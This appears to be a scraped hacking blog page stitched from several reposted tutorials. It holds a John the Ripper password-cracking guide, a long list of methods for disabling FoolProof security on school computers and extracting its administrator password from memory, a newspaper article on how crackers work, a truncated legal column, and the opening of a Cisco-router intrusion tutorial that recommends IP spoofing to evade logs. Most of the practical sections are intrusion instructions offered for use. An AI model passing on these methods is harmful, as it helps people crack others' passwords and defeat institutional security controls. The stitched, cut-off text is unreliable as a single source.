This switch turn on not only browsing through the dictionary, but it uses some modifications of the words that are word dictionary (like adding a number at the end of pass - fool -> fool1, etc' etc'). This one will take long with huge pass dictionary, but it may give better results... For a start you could do a try with a small pass dictionary, and if it doesn't works you can try it with a huge pass dictionary.

Sometimes people are not stupid when they choose passwords and basic rules won't do a job... aaargh. As you've seen it takes more and more time for your CPU to crack this thing out as we go further. Now you can leave your computer on and go to sleep....

If you want to get even more possible passwords out of your password file, try typing

john -i password.file

This -i stands for incremental cracking, not a really good word for it, but...
Okay, what the hell does it do? It uses the default incremental mode parameters, which are defined in john.ini.
What does this mean? Do you remember -rules? Yes, well, of course you do, unless you're either incredibly senile or you've stopped reading after this part and only came back, like... a couple of years later. That is very much like rules, but much much more powerful than -rules, and it takes much, much more time.

4) So where are we now (dictionary vs. brute-force)?

--------------------------------------------------------------------------------

You can see that in all cases you use so-called dictionary cracking... but hell, why not just run John on a mode where it tried all possible combinations of lowercase and uppercase letters, numbers and symbols? I mean, this would be much more efficient, right? ... WROOOOOOONGG!!!
This method is called 'brute-force' attack (basically, dictionary attack is also sort of brute-force attack, but most people use the word brute-force for this specific attack).
What are the differences? First and most important, with dictionary you go through the selected words that could be passwords and their modifications, and with brute force cracking you use ALL possible combinations. That means you have
comb=nrch^let

where:

comb - number of possible combinations
nrch - number of chars
let - number of letters used

In case you're dealing with john's default -i 95 character set and, presume, a 6 letter password you have possible 735091890625 combinations! OUCH!!
Sure, this is useful for passwords like 2405v7, but still... with the computational powers of today's modern PC, I'd just give up, unless I had access to some University's supercomputer, which I'd bet noone would ever give me (well, at least not for free, and certainly not to run a password cracker on it).
As you can see it can take a looooong time until you crack a single one pass, do a little math and try to calculate how many possible combinations there are for 10, 12 and 16 chars.
I don't think you'll like the answer :)
Of course, sometimes dictionary attacks are not enough, but john has very powerful 'thinking'. In 'incremental' mode john will do all possible combinations from 0 to 8 characters (by zero password length is considered a hashed empty string, this sometimes happens). So incremental mode is one sort of brute-force attack in some way...

If you want to fire all weapons at one then you use

john password.file

this will do first basic dictionary attack, then -rules, then -i

5) What if...

--------------------------------------------------------------------------------

Ok, you have to turn off your box from time to time, don't you? If you're doing that haaard password that will take more than 20 hours of cracking you can set john with ctrl+c and then resume with

john -restore

If your box crashes or if there's a power failure, you won't be able to restore your cracking sessions (sometimes)... well that's just too bad. Hell, it happened
to me once :-(

John is modular, and that is the most powerful thing about john the ripper, and that is what makes john the most advanced password cracker. John is very, very modular. John uses modes that are described in john.ini (do you still remember that incremental cracking i was talking about? Modes for rules and incremental are described in john.ini).
If you're some inventive guy then you may change the parameters in john.ini.

Here is example how some default parameters for -i look like:

# Incremental modes
[Incremental:All]
File = ~/all.chr
MinLen = 0
MaxLen = 8
CharCount = 95

Ok... what do we have here?

[Incremental:All] - this stands for the beginning of the definition for the -i:all switch
File - filename of file that has characters used in mode -i:all (whole character
set)
MinLen - logically, minimum length of password that john -i:all would try
MaxLen - even more logical, maximum length of password that will john -i:all try
CharCount - number of chars used by john when you 'turn on' this switch

So, there are some more switches... heh
Yes there are and down there are all default modes pasted from john the ripper's documents:

John the Ripper's Command Line Options

--------------------------------------------------------------------------------

You can list any number of password files on John's command line, and also
specify some of the following options (all of them are case sensitive, but
can be abbreviated; you can also use the GNU-style long options syntax):

single "single crack" mode Enables the "single crack" mode, using rules from [List.Rules:Single].
wordfile:FILE wordlist mode, read words from FILE,
stdin or from stdin These are used to enable the wordlist mode.
rules enable rules for wordlist mode Enables wordlist rules, that are read from [List.Rules:Wordlist].
incremental[:MODE] incremental mode [using section MODE] Enables the incremental mode, using the specified ~/john.ini definition (section [Incremental:MODE], or [Incremental:All] by default).
external:MODE external mode or word filter Enables an external mode, using external functions defined in ~/john.ini's [List.External:MODE] section.
stdout[:LENGTH] no cracking, write words to stdout When used with a cracking mode, except for "single crack", makes John print the words it generates to stdout instead of cracking. While applying
wordlist rules, the significant password length is assumed to be LENGTH, or unlimited by default.
restore[:FILE] restore an interrupted session Continues an interrupted cracking session, reading point information from the specified file (~/restore by default).
session:FILE set session file name to FILE Allows you to specify another point information file's name to use for this cracking session. This is useful for running multiple instances of John in parallel, or just to be able to recover an older session later, not always continue the latest one.
status[:FILE] print status of a session [from FILE] Prints status of an interrupted or running session. To get an up to date status information of a detached running session, send that copy of John a SIGHUP before using this option.
makechars:FILE make a charset, overwriting FILE Generates a charset file, based on character frequencies from ~/john.pot, for use with the incremental mode. The entire ~/john.pot will be used for
the charset file unless you specify some password files. You can also use an external filter() routine with this option.
show show cracked passwords Shows the cracked passwords in a convenient form. You should also specify the password files. You can use this option while another John is cracking, to see what it did so far.
test perform a benchmark Benchmarks all the enabled ciphertext format crackers, and tests them for
correct operation at the same time.
users:[-]LOGIN|UID[,..] load this (these) user(s) only Allows you to filter a few accounts for cracking, etc. A dash before the list can be used to invert the check (that is, load all the users that aren't listed).
groups:[-]GID[,..] load this (these) group(s) only Tells John to load users of the specified group(s) only.
shells:[-]SHELL[,..] load this (these) shell(s) only This option is useful to load accounts with a valid shell only, or not to load accounts with a bad shell. You can omit the path before a shell name, so '-shells:csh' will match both '/bin/csh' and '/usr/bin/csh', while '-shells:/bin/csh' will only match '/bin/csh'.
salts:[-]COUNT set a passwords per salt limit This feature sometimes allows to achieve better performance. For example you can crack only some salts using '-salts:2' faster, and then crack the
rest using '-salts:-2'. Total cracking time will be about the same, but you will get some passwords cracked earlier.
format:NAME force ciphertext format NAME
Allows you to override the ciphertext format detection. Currently, valid
format names are DES, BSDI, MD5, BF, AFS, LM. You can use this option when
cracking or with '-test'. Note that John can't crack password files with
different ciphertext formats at the same time.
savemem:LEVEL enable memory saving, at LEVEL 1..3
You might need this option if you don't have enough memory, or don't want
John to affect other processes too much. Level 1 tells John not to waste
memory on login names, so you won't see them while cracking. Higher levels
have a performance impact: you should probably avoid using them unless John
doesn't work or gets into swap otherwise.
6) Tips

--------------------------------------------------------------------------------

I) A good schedule to do your cracking job is

john -w:words.lst password.file

john -w:words.lst -rules password.file

john -w:words.lst password.file

john -i:digits password.file

john -i:all password.file

II) If you have a file that has only passes that look like

owner:*:510:102:His name:/home/subdir/owner:/bin/bash

you have a shadowed passwords file.
Go to the Byte-Me page at blacksun.box.sk and try to find out more about
password files (I'll leave it up to you to do this. It's important that you'll
learn how to find things by yourself).

III) You have some little tools that you get with john, they are all
listed below (from john's docs)

unshadow PASSWORD-FILE SHADOW-FILE
Combines the passwd and shadow files (when you already have access to
both) for use with John. You might need this since if you only used your
shadow file, the GECOS information wouldn't be used by the "single crack"
mode, and also you wouldn't be able to use the '-shells' option. You'll
usually want to redirect the output of 'unshadow' to a file.

unafs DATABASE-FILE CELL-NAME
Gets password hashes out of the binary AFS database, and produces a file
usable by John (again, you should redirect the output yourself).

unique OUTPUT-FILE
Removes duplicates from a wordlist (read from stdin), without changing
the order. You might want to use this with John's '-stdout' option, if
you got a lot of disk space to trade for the reduced cracking time.

mailer PASSWORD-FILE
A shell script to send mail to all the users who got weak passwords. You
should edit the message inside before using.

--------------------------------------------------------------------------------

So, that was about it... hope you've got something from this text.
Further readings: try reading ALL the documentation you get with john in the docs
directory. Maybe it's a little bit chaotic, but.... man those are the docs :)

Ohh, wait, wait!!
Remember, not all password files can be cracked! Smart admins alter the
encryption that they are using, especially when it comes to root passwords.
But there are always other ways to get passwords. These are covered in other
BSRF tutorials. Collect them all (lol) at http://blacksun.box.sk.

Various ways to hack or over-ride

2007-12-02T01:23:00.000-08:00

There are various ways of HACKING or Over-riding FoolProof. First off,
let me give you a little bit of information about FoolProof. FOo0l
Pro0F was developed my SmartStuff and is a program that is used by
most schools in order to prvent unwanted users from changing system
files and to stop them from doing specific acts. Such acts could
include RIGHT-CLICKING, COPYING, RENAMING, USING DOS, etc...

Method 1

This is a method my friend and I discovered. We were on a Windows 98 platform.

1.Step one is preperation. You need to enter the system's BIOS setup (usually by pressing DEL or F2, it will say on the boot
screen) right away at startup. Make sure that the computer reads from the A:\ drive
before it goes to C:\.

You will also need to aquire a Windows boot disk. Put Edit.com on the
boot disk as
well. It's available on my site.

2.Boot up the computer with the boot disk in the disk drive. Select
start the
computer without cd support. Let the computer run its course, it will
take about
a minute. Eventually you will get to a C: prompt. Change to an A:
prompt.

3.Once you have the A: prompt, open up Edit.com.

4.In Edit.com, go to open, then search in C:\Windows and find WIN.INI.
Open it.

5.Scroll down through the WIN.INI file and find a section that starts
off:
[Foolproof]. Delete that entire section. This is the code that makes
Foolproof open
every time you boot windows. By deleting it, you are preventing
Foolproof from opening.
MAKE SURE TO SAVE THE WIN.INI FILE BEFORE EXITING!

6.From here you are free to do whatever you want in Windows. I
suggest going into C:
and locating Unfool.exe. It is Foolproof's uninstall program.

~^AmnesiA^~ Method 2
/////////////////////

This is a method i discovered
on my own a little later.
I was working on a WIN98 platform once again.

This time, security was damn strict on the
machine. The entire C:\ drive was masked and could
not be accessed, not even in DOS! Belive me, I tried
everything, and nothing was working. Security was so
tight on this comp, it was pretty much a high tech
paperweight.

This was very frustrating, but I finally found a way around it.

1. Step one is again preperation. Make sure that the computer boots
from A:\ first
by going into the BIOS.

Have a Win98 boot disk ready. On this disk have Edit.com and
CMOSKILLA, both downloadable
from my site.

2. Boot from the Win98 boot disk. Select start computer without CD
support. Wait until
you get your C:\ prompt, and again, revert to the A:\ prompt. Run
CMOS Killa.

This will make the computer beep for a second, then it will restart
itself.

3. Again, boot up the computer from the boot disk and select no CD
support. This time
at the C:\ promt, use the DIR command and see if the drives are still
masked. If they
are, then CMOS Killa didn't help, and until I think of something new,
you're S.O.L.

If you can see the all of C:\, then refer to method one for further
instructions on
what to do with Edit.com

OR!!!!!

Try some other methods yourself. Now that you can see the drives, you
can try running
C:\unfool.exe. You might want to try booting in safe mode now,
because it should work.

NINJA Technique 1
/////////////////////

You can do these things as long as you have access
to C:\. Refer to my methods numbers 1 and 2.

1.Go into the Autoexec.bat with edit.com and delete FPTSR.exe

2.Go into Config.sys with edit.com and delete the line device=fp

3.Run REGEDIT.EXE. You have to remove FoolProof from the Registry,
too. Use the Regedit search feature to find references to Fool Proof.
Find the Registry backup files and make copies with different names
just in case. Making a mistake with the Registry can cause spectacular
messes!
Save the registry, and reboot. FoolProof won't load.

_________________
I got these last two from another page...i don't remember
which, but I don't want to make people think I thought of shit
when it really wasn't me.

~ShadoW^ Method 1
//////////////////

1) Boot up in Safe Mode bypasses FoolProof's TSR making it possible
for the user to delete
the FoolProof's directory.

My comments:
This can be tricky because many times FoolProof blocks hotkeys
which allow
you to boot in safe mode. I have even tried turning off the
computer halfway
through a boot and then starting up again, and still I couldn't
drop into safe
mode. So try this if you want, but I haven't had much success
with it.

2) Holding the key under Macintosh prevents FoolProof's
module from loading.

My comments:
I have no experience with FoolProof on Macs so I have no idea if
this works.

3) Creating a copy of 'command.com' with the name of 'temp.txt' (for
example), then opening
it up with wordpad, and saving it as 'c:\windows\help\wordpad.hlp'
(make sure you don't
convert the file), then simply click on the HELP feature under the
START menu, and you will
be dropped into dos.

My comments:
This sounds all good and dandy, but I have never seen a system
running FoolProof that
actually allows the user to access the help option. So if you
have access to help, go
ahead and try.

4) Use the 'echo' command to overwrite FoolProof's files (i.e.
execute the following command
'echo Hi > c:\fool95\fooltsr.exe', 'fool95' stands for the
directory FoolProof is installed in).

My comments:
I assume whoever came up with this idea wants this done in DOS or
with a batch file. The
systems I have used haven't allowed batch files to be run, and
have made it tricky to get
into DOS.

5) Grab the administrator password by locating it in the swap file
crated by Windows 95. You
can accomplish this by simply finding the string 'FOOLPROO', and
the string after that will be
the administrator password.

My comments:
You will need a hex editor. Check for a link on the site.

~ShadoW^ Method 2
//////////////////

I modified this text to save space. I pretty much just cut
it down to the main points. Most of the stuff here pretains to
Windows 3x versions. Take a look and see if you see anything
handy.
_____________________________________________________________________

All my information pertains directly to
versions 3.0 and 3.3 of both the 3.x and
95 versions but should be good for all
early versions if they exist.

My first success with breaking FoolProof passwords came by using
a hex editor to scan the windows swap file for anything that might be
of
interest. In the swap file I found the password in plain text. I was
surprised but thought that it was something that would be simply
unavoidable and unpredictable. Later though I used a memory editor on
the machine (95 loves it when I do that) and found that FoolProof
stores
a copy of the user password IN PLAIN TEXT inside its TSR's memory
space.

To find a FoolProof password, simply search through conventional
memory for the string "FOOLPROO" (I don't knowwhat they did with that
last "F") and the next 128 bytes or so should contain two plaintext
passwords followed by the hot-key assignment. For some reason
FoolProof
keeps two passwords on the machine, the present one and a 'legacy'
password (the one you used before you _thought_ it was changed).
There
exist a few memory viewers/editors but it isn't much effort to write
something.

Getting to a point where you can execute something can be
difficult but isn't impossible. I found that it is more difficult to
do
this on the win3.x machines because FoolProof isn't compromised by the
operating system it sits on top of; basicly getting a dos prompt is up
to
you (try file manager if you can). 95 is easier because it is very
simple to convince 95 that it should start up into Safe-Mode and then
creating a shortcut in the StartUp group to your editor and then
rebooting the machine (FoolProof doesn't get a chance to load in safe
mode).

JohnWayne

MISC Method 1
///////////////

1. Launch a process viewing application (for example, Microsoft's
pviewer) and kill
FoolProof's running VXDs. Foolproof will now be disabled (although it
will be loaded again on
the next boot)

My comments:
Haven't tried it. Again, the machines I have been on have had the
security as
tight as possible. I don't see running a proccess viewing application
as a
plausible option. But go for it if you want.

2. To uninstall Foolproof, move all the files from the FoolProof
directory (which is '\sss' by
default) to a temporary directory. Be sure to move all the files
except the two .VXD files. On
the next boot only the VXDs will be loaded, but Foolproof will be
disabled (since the other
necessary files will not be in FoolProof's directory). Now move the
FoolProof files back to
their original directory, and run Unfool.exe (which is usually located
in the Windows directory).

My comments:
Haven't tried this either. Moving files has always been restricted
for me too.

3. The standard version of FoolProof does not block network file
access. So if you have a
network (as most schools do) then depending on the configuration of
your
account and the network itself, there are ways around certain aspects
of FoolProof.
For example, if you are using NetWare (4.11 is what this has been
tested on) and NAL to
manage access to network applications, there is a convenient way to
get to browse drives that
may be blocked, and to get to the explorer options menu (file types,
view hidden files, etc..).
Open your Server Apps folder (or Applications, or whatever your
version of NAL calls it, it is
the folder that is created on the desktop by NAL to provide access to
NAL applications).
Since the Server Apps folder is actually part of NAL, and therefore
considered a network
entity, FoolProof won't even attempt block it. Once it is open, you
can view the explorer
toolbar, or options menu and browse from there. That is assuming, of
course, that they have
been blocked on your system.

My comments:
The systems I cracked had blocked network access.

4. Rename the executable you wish to run to .SCR extension. FoolProof
does not block
screen savers, so the executable can now be launched, masquerading as
a screen saver.

My comments:
This sounds like it might be plausable. I will try it in the future,
but
as it stands now, I have not tested this.

5. Run the executable from a network drive

My comments:
I couldn't.

6. Run Word, and open a shell session using the macro Shell
Environ$("COMMAND").

My comments:
Sounds money. Haven't tried it.

7. If the workstation is a Novell client, it's possible to hit 'F1'
from the login screen, and when
the help screen comes up, select the 'file' menu and then 'open'. Now
you can browse the local
drives, and rename FoolProof's directory.

My comments:
I didn't work under Novell client, but I am interested to know if this
is
legit.

8. If a Virus Scanning utility is installed, right-click on a folder
and select 'Scan for Viruses'.
Now select the 'log' option, and change the location of the log file.
Now you can browse
around the local drive, again being able to rename the FoolProof
folder.

My comments:
This is actually a really good way to go if possible. I tried it on a
computer
that was running Mcaffe. I went into the log option and then selected
the "browse"
option to decide where to place the log text. You can then see things
previously
hidden by Foolproof. By hitting F2 while selected on an object, you
can rename it.
So go ahead and try to rename the Foolproof directory or files. My
hotkeys (F2) were
disabled, but yours may not be.

9. In any application that has a standard file choosing dialog
(usually under the 'file', 'open'
menu), browse to the directory containing the desired application
(good examples are
c:\windows\explorer.exe or c:\command.com), right click the .exe and
choose "Quick View".
The program's icon appears in the upper left had corner of the window
- click it and Voila!
Your application is running.

My comments:
On the machines I cracked, the C: directory was shadowed, therefore
when I went into a program's
"open" command, opening something from C: was not an option.

10. Start a DOS session (by running command.com), and trash the
foolproof VXD file by
typing: echo hi> c:\fp95\fpvxd.vxd
Restart windows, and a screen will appear saying that
c:\fp95\fpvxd.vxd is corrupt. Hit
CTRL+ALT+DELETE and when windows will load you will be able to choose
which mode
to boot from. Select 'safe mode' and you'll be able to uninstall
foolproof (or simply delete the
entire foolproof directory). Alternatively, when in safe mode, just
start a DOS session and
type: echo hi> c:\fp95\fplw16.exe. Now you can restart your computer:
Foolproof will be
disabled.

My comments:
I couldn't run command.com, or open in safe mode. This might prove
difficult.
Also note that this appears to apply to an early version of Foolproof.
I say this
because in later versions the Foolproof directory is C:\Sss, not
C:\fp95.

11. Run: c:\Windows\System\msconfig.exe or click on: Start -> Run ->
msconfig
Now go to the Startup tab, and uncheck everything that says
"FoolProof". Restart, and
foolproof will be disabled.

My comments:
Sounds old to me (at least versions of Foolproof on which this would
work). My "Run"
option was gone, and I couldnt run unauthorized .exe's.

12. Reboot with a Win98 boot disk and select the second option (Start
without CD-ROM
support), type the command "rename c:\sss\foolstr.exe nfoolstr.exe"
where c:\sss is
FoolProof's directory, remove boot disk and restart. FoolProof should
not start and you may
get an error message. Click start --> find, and type nfoolstr.exe.
Rename it to "foolstr.exe".
Find the file unfool.exe and run it. Now do whatever you want!

My comments:
I haven't tried this exact method, but I have always found that the
first half (using a boot
disk) is the best way to get started. From my experience this looks
to be an ideal method
as long as you have access to the Foolproof directory (C:\Sss) from
DOS.

MISC Method 2
///////////////

FoolProof Security is a desktop security application for Windows
95/98/ME. Its purpose is to block users from accessing all programs,
except those which are intended by the administrator. Additionally, it
is
intended to allow the user to only save files to specific locations
(usually the floppy disk drive). FoolProof Security is usually found
in
computer labs, or on publicly accessible systems.

A vulnerability exsists in FoolProof Security, in that it restricts
certain programs to be executed only by name. By renaming a restricted
program, it can be successfuly executed. This vulnerability can be
used to
sucessfully circumvent the security measures put forth by FoolProof,
and
even remove it entirely from the system.

The following is an example:

On a system with FoolProof Security installed open an MS-DOS Shell
(usually found in Start Menu -> Programs -> Accessories).
['COMMAND.EXE'
is not restricted by FoolProof.] At the command prompt issue the 'ftp'
command and open a connection to an ftp server in which you have write
access to. ['FTP.EXE' is not restricted by FoolProof.] Upload the
restricted program in which you wish to run. [such as 'deltree',
'xcopy', 'edit', 'fdisk', and 'format'.] Afterwords, download these
programs under a different name. [Use names other than those of
restricted
programs. Names such as 'tmp001a.exe' work.] You will now be able to
use
these programs, just as if they were the restricted equivilant.

Side Note: Although you can use this process to use 'regedit', the
registry is still locked by FoolProof.

Solution:

A quick fix, would be the removal of the 'ftp' client (although it
will
still be possible to download a simple ftp client that will do the
same
job.)

Additionally, any shortcuts to 'command' should be removed, as this
method
will not work without it.

How cracker's crack

2007-12-02T01:22:00.002-08:00

Mercury News Computing Editor

Police, prosecutors and most of the press call them
"hackers." Computer cognoscenti prefer the term "crackers."

Both sides are talking about the same people, typically
young men, whose fascination with computers leads them to gain
access to computers where they don't belong.

A few crackers make headlines, like Robert T. Morris Jr.,
son of a top computer security expert for the supersecret
National Security Agency, who let loose a "worm" program on a
national network of university, research and government computers
in 1988.

There are also notorious crackers like Kevin Mitnick, who
was under investigation at the age of 13 for illegally obtaining
free long-distance phone calls and was sentenced to prison in
1989 for computer break-ins.

Then there are legions of far more ordinary crackers who
simply use their knowledge of computers to "explore" intriguing
corporate or government computers or simply to go for the
electronic equivalent of a joy ride and impress their friends.

But they all share something: an air of mystery. How do they
do it?

At a recent conference on computer freedom and privacy,
computer expert Russell L. Brand gave a four-hour lecture on the
inner workings of computer cracking.

His basic message: Cracking is not as hard as it seems to an
outsider, and it often goes undetected by legitimate users of
"cracked" computers.

"Just because you don't see a problem is no reason to think
a problem hasn't occurred," Brand said. "Generally it's a month
to six weeks before (operators) notice anything happened and
usually because the cracker accidentally broke something."

Home computers aren't in danger from crackers because they
aren't accessible to outsiders--and because they aren't
interesting to crackers. Instead, they target mainframes and
minicomputers that support many users and are connected to
telephone lines and large networks.

Understanding how crackers work and what security weaknesses
they exploit can help system managers prevent many break-ins,
Brand said. And the biggest problem is carelessness.

"When I started looking at break-ins, I had the assumption
that technical problems were at fault," he said. "But the problem
is human beings."

The "Cracker": Most crackers are not bent on stealing either
money or secrets but will target a particular computer for entry
because of the bragging rights they will enjoy with fellow
crackers once they prove they broke in. Typically, the computer
belongs to a corporation or the government and is considered in
cracking circles to be hard to penetrate. Often, it is connected
to the nationwide NSFNet computer network.

The attack: Crackers can attack the target computer from
home, using a modem and a telephone line. Or they can visit a
publicly accessible terminal room, like one on a college campus,
using the school's computer to attack the target through a
network. At home, the cracker works undisturbed and unseen for
hours, but phone calls might be traced.

The resources: If the target computer is nearby, the cracker
may look through the owner's trash for valuable information, a
practice called "dumpster diving." Discarded printouts, manuals
or other paper may contain lists of accounts, some passwords, or
technical data more sophisticated crackers can exploit.

The target: The easiest way to enter the target is with an
account name and its password. Passwords are often the weakest
link in a computer's security system: Many are easy to guess, and
some accounts have no password at all. Sophisticated crackers use
their personal computers to quickly try thousands of potential
passwords for a match.

The cover: To make calls from home harder to trace, crackers
might use stolen telephone credit-card numbers to place a series
of calls through different long-distance carriers or corporate
switchboards before calling the target computer's modem.

The way in: Many crackers take advantage of "holes" in the
operating system, the software that controls the basic operations
of the machine. The holes are like secret doors that either let
crackers make their own "super" accounts or just bypass accounts
and passwords altogether. Five holes in the Unix operating system
account for the bulk of computer break-ins--yet many
installations have failed to patch them.

The network: Most large computers are connected to several
others through networks, a chief point of attack. Computers erect
barriers to people but often completely trust other computers, so
attacking a computer through another computer on the network can
be easier than attacking it with a personal computer and a modem.

Ill-used passwords let many pass

Passwords are the security linchpin for most computer
systems. But these supposedly secret keys to computer access are
easily obtained by a determined cracker.

The main reason: Users and system managers often are so
careless with passwords that they are as easy to find as a door
key left under the welcome mat.

Part of the problem is the proliferation of computers and
computerlike devices such as automated teller machines, all of
which require passwords or personal identification numbers. Many
people must now remember half a dozen or more such secret codes,
encouraging them to make each one short and simple.

Often, that means making their passwords the same as their
account name, which in turn is often the user's own first or last
name. Such identical combinations are called "Joe" accounts, and
according to computer expert Russell L. Brand, they are "the
single most common cause of password problems in the world."

These `secret' keys to computer access are easily obtained
by a determined cracker. The main reason: Users and system
managers often are so careless with passwords that they are as
easy to find as a key left under the welcome mat.

Knowing there are Joes, a cracker can simply try a few dozen
common English names with a reasonable chance that one will work.
Armed with an easily obtained company directory of employees, the
task can be even easier.

Joe accounts also crop up when the system manager creates an
account for a new employee, expecting that the user will
immediately change the given password from his or her name to
something else. But users often fail to make the change or aren't
told how. Sometimes, they never use the account at all, providing
not only easy access for the cracker but an account where the
owner won't notice any illicit activity.

Even if crackers can't find a "Joe" on the computer they
want to enter, there are several other common ways for them to
find a password that will work:

- Many systems have accounts with no passwords or have
accounts for occasional visitors to use where the ID and password
are both GUEST.

- Outdated operator's manuals retrieved from the trash often
list the account name and standard password provided by the
operating system for use by maintenance programmers. Although it
can and should be changed, the password seldom is.

- "Social engineering"--in effect, persuading someone,
usually by telephone, to divulge account names, passwords or
both--is a common ploy used by crackers.

- Crackers are sometimes able to obtain an encrypted list of
passwords for a target computer, discarded by the owners who
mistakenly believe the coded words aren't useful to crackers.
While it's true they are difficult to decode, it is easy for a
cracker to use a personal computer to take a potential password
and encode it. Because most passwords are ordinary English words,
crackers can simply run a personal computer program to encode the
contents of an electronic dictionary and identify any entries
that match passwords on the coded list.

- In another form of deception, crackers set up public
bulletin board systems whose real purpose is to snag passwords.
Because many people tend to use the same password for all their
computer accounts, the cracker can simply wait until someone who
has an account on the target computer also sets up an account on
the bulletin board. The cracker then reads the password and tries
it on the target system.

While individual users can't delete dormant accounts from
their computers or keep an eye on the trash, they can be
intelligent about what passwords they use. Brand suggests users
choose a short phrase that's easy for them to remember and then
use the first two letters of each word as the password. As added
protection, users who are able should mix uppercase and lowercase
letters in their passwords or use a punctuation mark in the
middle of the word.--Rory J. O'Connor

The rights of bits

Constitutional scholar Laurence H. Tribe, widely considered
the first choice for any Supreme Court vacancy that might arise
under a Democratic administration, proposed a fairly radical idea
recently: a constitutional amendment covering computers.

Tribe's proposal for a 27th Amendment would specifically
extend First and Fourth Amendment protections to the rapidly
growing and increasingly pervasive universe of computing. Those
rights would be "construed as fully applicable without regard to
the technological method or medium through which information
content is generated, stored, altered, transmitted or
controlled," in the words of the proposed amendment.

I am not a constitutional scholar, but I have to believe
that what's needed is not a change in the Constitution, but
instead a change in the thinking of judges in particular and the
public in general.

Tribe acknowledges that he doesn't take amendments lightly,
pointing to the ridiculous brouhaha over a flag-burning amendment
as an example of what not to do to the basic law of the land. But
like many people who are more deeply involved in the world of
computers, Tribe sees the issue of civil liberties in an
information society as a crucial one.

The question is not whether the civil liberties issue is
serious enough to be addressed by some fundamental legal change.
The question is really how to get people to see that
communicating with a computer is speech, and that to search a
computer and seize data is the same as searching a house and
seizing the contents of my filing cabinet.

People seem to have trouble making these connections when
computers are involved, even though they wouldn't have trouble
recognizing a private telephone conversation as protected speech.
Yet most telephone calls in this country are, at some time in
their transmission, nothing more than a stream of computer bits
traveling between sophisticated computers.

Admittedly, computers do make for some complications where
things like search and seizure are concerned.

Let's say the FBI gets a search warrant for a computer
bulletin board, looking for a specific set of messages about an
illegal drug business. Because a single hard disk drive on a
bulletin board system can contain thousands of messages from
different users, the normal method for police will be to take the
whole disk, and probably the computer as well, back to the lab to
look for the suspect messages.

Of course, that exposes other, supposedly confidential
messages to police scrutiny. It also interrupts the legitimate
operation of what is, in effect, an electronic printing press.

Certainly, in the case of a real printing press that used
paper, such police activity would never be allowed. But a
computer is involved here, which to some appears to make the
existing rules inapplicable.

But in a case like this, we don't need a new amendment, just
the proper application of the Bill of Rights.

As a more practical matter, the chances of amending the
Constitution are slight. It was the intent of the framers to make
the task difficult, to prevent just such trivial things as
flag-burning amendments from being tacked onto the document. Even
the far more substantial Equal Rights Amendment did not survive
the rocky road from proposal to adoption. I doubt Tribe's &nbs

Exploiting cisco systems

2007-12-02T01:22:00.001-08:00

Warning:
DO NOT use this to damage cisco systems, or gain unauthorized access to systems. This tutorial is just something to
use for educational purposes. Only use this information in a legal way (the hacker wargames for instance), and do
not damage or destroy anything. This is a step-by-step guide on how a series of proven cisco exploits can be used to
gain access. If you get caught breaking into a cisco router, or screw the system up, you can interrupt hundreds of
internet clients, and cost thousands of dollars, so only use this when you are allowed!! Using this the wrong way
will get you into a lot of trouble.

Note: some of this tutorial was written on a Unix system, and the text was not converted to be DOS /
Windows-compatible, so you'll have to view this text from either your Internet browser, or from an advanced editor
such as Microsoft Word.

----------------------------------
Table of Contents:
----------------------------------
Before you start:

- What is an IP address?

- What is an ISP?

- What is a TCP/IP packet?

- How to spoof your IP

- How to use Telnet

- How to use HyperTerminal

- How to use Ping

- How to use TraceRoute

- How to use a proxy server

-------------------------------------

- Section 1: why hack a cisco router?

- Section 2: how to find a cisco router

- Section 3: how to break into a cisco

- Section 4: how to break the password

- Section 5: how to use a cisco router

-----------------------------------

Stuff you'll need to know BEFORE you start:

-----------------------------------

What is an IP address?

IP stands for Internet Protocol, IP addresses are used by other computers to identify computers that connect to
them. This is how you can be banned from IRC, and how they can find your ISP. IP addresses are easily obtained, they
can be retrieved through the following methods:

-you go to a website, your IP is logged

-on IRC, anyone can get your IP

-on ICQ, people can get your IP, even if you have the option set "do not show ip"
they can still get it

-if you are connected to someone, they can type "systat", and see who is connected to them

-if someone sends you an email with IP-logging java, they can also get your IP address

There are many more ways of obtaining IP addresses, including using back-door programs such as Sub7 or NetBus.

------------------------------------

What is an ISP?

ISP stands for Internet Service Provider, they are the ones that give you the internet. You connect to one everytime
you dial-up and make a connection. People can find your ISP simply by running a traceroute on you (traceroute is
later explained). It will look something like this:

tracert 222.222.22.22

Tracing route to [221.223.24.54]
over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target's isp
10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.

-----------------------------------

What is a TCP/IP packet?

TCP/IP stands for Transmission Control Protocol and Internet Protocol, a TCP/IP packet is a block of data which is
compressed, then a header is put on it and it is sent to another computer. This is how ALL internet transfers occur,
by sending packets. The header in a packet contains the IP address of the one who originally sent the packet. You
can re-write a packet and make it seem like it came from anyone!! You can use this to gain access to lots of systems
and you will not get caught. You will need to be running Linux or have a program which will let you do this. This
tutorial does not tell you to use this on a Cisco router, but it does come in handy when hacking any system. If
something goes wrong when you try to hack a system, you can always try this...

------------------------------------

How to spoof your IP:

Find a program like Genius 2 or DC IS, which will let you run IdentD. This will let you change part of your
computer's identity at will! Use this when you get banned from some IRC chat room.... you can get right back in! You
can also use it when you are accessing another system, so it logs the wrong id...

------------------------------------

How to use telnet:

You can open telnet simply by going to your Start Menu, then to Run, and typing in "telnet".

Once you have opened telnet, you may want to change some features. Click on Terminal>Preferences. Here you can
change the buffer size, font, and other things. You can also turn on/off "local echo", if you turn local echo on,
your computer will show you everything you type, and the other computer you are connected to will show you aswell.
So you may get something like this;

You type "hello", and you get
hhelelollo

This is because the information has bounced back and got scrambled with what you typed. The only reason I would use
this is if the machine does NOT return what you are typing.

By default, telnet will connect to a system on the telnet port, which is port 23. Now you will not always want to
connect to port 23, so when you go to connect, you can change the port to maybe 25, which is the port for mail
servers. Or maybe port 21, for FTP. There are thousands of ports, so make sure you pick the right one!

----------------------------------

How to use HyperTerminal:

HyperTerminal allows you to open a "server" on any port of your computer to listen for incoming information from
specified computers. To use this, go to
Start>Programs>Accessories>Communications>HyperTerminal. First you will need to select the connection, pick "TCP/IP
